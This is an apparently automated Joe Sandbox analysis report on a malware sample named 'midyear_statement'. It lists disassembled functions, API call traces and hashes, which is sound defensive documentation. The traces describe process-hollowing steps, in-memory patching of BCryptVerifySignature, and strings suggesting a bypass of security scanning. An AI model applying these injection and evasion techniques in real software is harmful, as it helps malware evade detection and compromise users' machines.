                                                                                                                                                                                          • NtUnmapViewOfSection.N(00000894,00590000,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,00000894,00292FF8,041004B0,00000004,041004B8), ref: 040B8B57
                                                                                                                                                                                            • Part of subcall function 040B78F8: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040B7905
                                                                                                                                                                                            • Part of subcall function 040B78F8: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040B790B
                                                                                                                                                                                            • Part of subcall function 040B78F8: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040B792B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                                                                                          • API String ID: 3979268988-2367850715
                                                                                                                                                                                          • Opcode ID: f354b93d9f3915233b1a3c959d4edf1be3f13b106eaf1b8bab3133dd86f597fb
                                                                                                                                                                                          • Instruction ID: d87dff25aad9e536427e6eebc7a269ee7c96c0401ebca7355ba3c993cb423689
                                                                                                                                                                                          • Opcode Fuzzy Hash: f354b93d9f3915233b1a3c959d4edf1be3f13b106eaf1b8bab3133dd86f597fb
                                                                                                                                                                                          • Instruction Fuzzy Hash: FFE21339A411189FEB51EBA4DC80FCEB3B9AF4560CF1041A29148BB614DBB0FE95CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A5A3C Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 10746 40a5a3c-40a5a7d GetModuleFileNameA RegOpenKeyExA 10747 40a5abf-40a5b02 call 40a5878 RegQueryValueExA 10746->10747 10748 40a5a7f-40a5a9b RegOpenKeyExA 10746->10748 10753 40a5b26-40a5b40 RegCloseKey 10747->10753 10754 40a5b04-40a5b20 RegQueryValueExA 10747->10754 10748->10747 10750 40a5a9d-40a5ab9 RegOpenKeyExA 10748->10750 10750->10747 10752 40a5b48-40a5b79 lstrcpynA GetThreadLocale GetLocaleInfoA 10750->10752 10755 40a5b7f-40a5b83 10752->10755 10756 40a5c62-40a5c69 10752->10756 10754->10753 10757 40a5b22 10754->10757 10759 40a5b8f-40a5ba5 lstrlenA 10755->10759 10760 40a5b85-40a5b89 10755->10760 10757->10753 10761 40a5ba8-40a5bab 10759->10761 10760->10756 10760->10759 10762 40a5bad-40a5bb5 10761->10762 10763 40a5bb7-40a5bbf 10761->10763 10762->10763 10764 40a5ba7 10762->10764 10763->10756 10765 40a5bc5-40a5bca 10763->10765 10764->10761 10766 40a5bcc-40a5bf2 lstrcpynA LoadLibraryExA 10765->10766 10767 40a5bf4-40a5bf6 10765->10767 10766->10767 10767->10756 10768 40a5bf8-40a5bfc 10767->10768 10768->10756 10769 40a5bfe-40a5c2e lstrcpynA LoadLibraryExA 10768->10769 10769->10756 10770 40a5c30-40a5c60 lstrcpynA LoadLibraryExA 10769->10770 10770->10756
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,040A0000,040CC790), ref: 040A5A58
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,040A0000,040CC790), ref: 040A5A76
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,040A0000,040CC790), ref: 040A5A94
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 040A5AB2
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,040A5B41,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 040A5AFB
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,040A5CA8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,040A5B41,?,80000001), ref: 040A5B19
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,040A5B48,00000000,?,?,00000000,040A5B41,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040A5B3B
                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 040A5B58
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 040A5B65
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 040A5B6B
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 040A5B96
                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 040A5BDD
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 040A5BED
                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 040A5C15
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 040A5C25
                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 040A5C4B
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 040A5C5B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                          • API String ID: 1759228003-2375825460
                                                                                                                                                                                          • Opcode ID: 6136e82d8dfd28118471b3525f5d8165c2bcff24087c2ed7f4bd3fb2c3fb3060
                                                                                                                                                                                          • Instruction ID: ed635bd781d7315362e91603cdcea9ebfc3e3b909322b06e7dab74bf7ca09b80
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6136e82d8dfd28118471b3525f5d8165c2bcff24087c2ed7f4bd3fb2c3fb3060
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D516775A5025C7EFB21D6E48C46FEFB7ECAB04748F4401A1B604FA181E674FB648B60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B7A50 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 12598 40b7a50-40b7a6b LoadLibraryW 12599 40b7a9a-40b7aa2 12598->12599 12600 40b7a6d-40b7a76 GetProcAddress 12598->12600 12601 40b7a78-40b7a90 NtWriteVirtualMemory 12600->12601 12602 40b7a94-40b7a95 FreeLibrary 12600->12602 12601->12602 12603 40b7a92 12601->12603 12602->12599 12603->12602
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(bcrypt,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360,040B99D0,UacInitialize,04100360,040B99D0,00000868,041003DC,ScanString,04100360,040B99D0), ref: 040B7A62
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 040B7A6F
                                                                                                                                                                                          • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360,040B99D0,UacInitialize), ref: 040B7A86
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360,040B99D0,UacInitialize,04100360,040B99D0,00000868,041003DC), ref: 040B7A95
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                                                                          • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                                                                          • API String ID: 1002360270-4067648912
                                                                                                                                                                                          • Opcode ID: 833ce6947aca4174376685b5a935ece15b52e058633259bfbb11297cabd142f4
                                                                                                                                                                                          • Instruction ID: 0c587730a93cf5f6d4f2943bed2987fe622957abfbfbc2553f18397d138f69c8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 833ce6947aca4174376685b5a935ece15b52e058633259bfbb11297cabd142f4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF0E9761493117DE150A1645C40EFF239CCBC2768F088A3AB9D4A7180D666A914C2F5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B78F6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24librarymemorynativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040B7905
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040B790B
                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040B792B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Windows\System32\ntdll.dll, xrefs: 040B7900
                                                                                                                                                                                          • NtAllocateVirtualMemory, xrefs: 040B78FB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                                                                          • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                                                          • API String ID: 421316089-2206134580
                                                                                                                                                                                          • Opcode ID: 5a773ca64b4bd0c36625993a59013230612cc9f76ba98992e035e8f587ec723d
                                                                                                                                                                                          • Instruction ID: 7d66b74d9bcb81993cd9b64767524bed3d9ac1872cfaaa0cca386af974e85632
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a773ca64b4bd0c36625993a59013230612cc9f76ba98992e035e8f587ec723d
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0E01AB224030CBFDB40DFA8D841FDA37ACEB1C614F048411BA04EB100DA71E9908BF8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B78F8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23librarymemorynativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040B7905
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040B790B
                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040B792B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Windows\System32\ntdll.dll, xrefs: 040B7900
                                                                                                                                                                                          • NtAllocateVirtualMemory, xrefs: 040B78FB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                                                                          • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                                                          • API String ID: 421316089-2206134580
                                                                                                                                                                                          • Opcode ID: ef807bbd041a9f5853a735ebc811bbec02c5bbbd7b4693b3515c26b6078d562a
                                                                                                                                                                                          • Instruction ID: 7cdb7f777c2bbc7c4e92550b7d8ba0d26b7ae339e9ba5260884b5ff7f2825f36
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef807bbd041a9f5853a735ebc811bbec02c5bbbd7b4693b3515c26b6078d562a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 91E01AB214030CBFDB40DFA8D841FCA37ACEB1C614F048411BA04EB100CA71E9908BF8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040BCE00 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040A4E90: SysAllocStringLen.OLEAUT32(?,?), ref: 040A4E9E
                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,040BCED0), ref: 040BCE3B
                                                                                                                                                                                          • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,040BCED0), ref: 040BCE6B
                                                                                                                                                                                          • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 040BCE80
                                                                                                                                                                                          • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 040BCEAC
                                                                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 040BCEB5
                                                                                                                                                                                            • Part of subcall function 040A4BD0: SysFreeString.OLEAUT32(040BD6AC), ref: 040A4BDE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1897104825-0
                                                                                                                                                                                          • Opcode ID: bc2008bf77e654ca009716b9ed86ac5eaa66af32e927b01fec1c029c5d5ed003
                                                                                                                                                                                          • Instruction ID: 140e92746aa711e83745ea131eaf7a6a947e0bcadac93e097cbbfdb5173f932b
                                                                                                                                                                                          • Opcode Fuzzy Hash: bc2008bf77e654ca009716b9ed86ac5eaa66af32e927b01fec1c029c5d5ed003
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1821CD75A54208BBFB11EAE4CC42FDEB7BCAB48708F500465B640F72C1DAB4BA158799
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040BD1D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 040BD30E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                                                                          • Opcode ID: 2406cde81fcd3f720dd18db98174af258e6d44aeca2744e7adad19645aea4128
                                                                                                                                                                                          • Instruction ID: 56ea444870f7f85f2d6b329f35d4a7e7ce2a79baa8b0c2fa0a83fa393ee58219
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2406cde81fcd3f720dd18db98174af258e6d44aeca2744e7adad19645aea4128
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C411D39A50209AFEB00EBE4D841EDEB3B9EF5960CF254531E040B7641DBB5BD218B95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040BCD1A Relevance: 6.1, APIs: 4, Instructions: 81nativefileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040A4E90: SysAllocStringLen.OLEAUT32(?,?), ref: 040A4E9E
                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,040BCDEE), ref: 040BCD5B
                                                                                                                                                                                          • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 040BCD95
                                                                                                                                                                                          • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 040BCDC2
                                                                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 040BCDCB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3764614163-0
                                                                                                                                                                                          • Opcode ID: 7b7354f3c6dfaf017f90fca81a6e48ab30a10ca0c6b97f3785ce0842e1ce313b
                                                                                                                                                                                          • Instruction ID: 7b5dff6b356e67108f9f5ebed7d9dce9eb80fceb5c816660a38647ec7c05cafa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b7354f3c6dfaf017f90fca81a6e48ab30a10ca0c6b97f3785ce0842e1ce313b
                                                                                                                                                                                          • Instruction Fuzzy Hash: F421EE75A50208BBFB11EAE4DD42FDEB7BCEB44B08F514065B640FB1C0D7B47A1486A8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040BCD1C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040A4E90: SysAllocStringLen.OLEAUT32(?,?), ref: 040A4E9E
                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,040BCDEE), ref: 040BCD5B
                                                                                                                                                                                          • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 040BCD95
                                                                                                                                                                                          • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 040BCDC2
                                                                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 040BCDCB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3764614163-0
                                                                                                                                                                                          • Opcode ID: aa3cff7fe6934803059f7bc699c11faff5ea3ffa94406c053d307d033d610c46
                                                                                                                                                                                          • Instruction ID: aca17035a8b47403c4d377c63766185dbae35d884f4ba63f440158a1d8ce8494
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa3cff7fe6934803059f7bc699c11faff5ea3ffa94406c053d307d033d610c46
                                                                                                                                                                                          • Instruction Fuzzy Hash: C921EC75A50208BBFB11EAE0DD42FDEB7BCAB44B08F514065B640FB1C0D7B47A148AA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B6D0C Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040B6CB0: CLSIDFromProgID.OLE32(00000000,?,00000000,040B6CFD,?,?,?,00000000), ref: 040B6CDD
                                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,040B6DF0,00000000,00000000,040B6D6F,?,00000000,040B6DDF), ref: 040B6D5B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
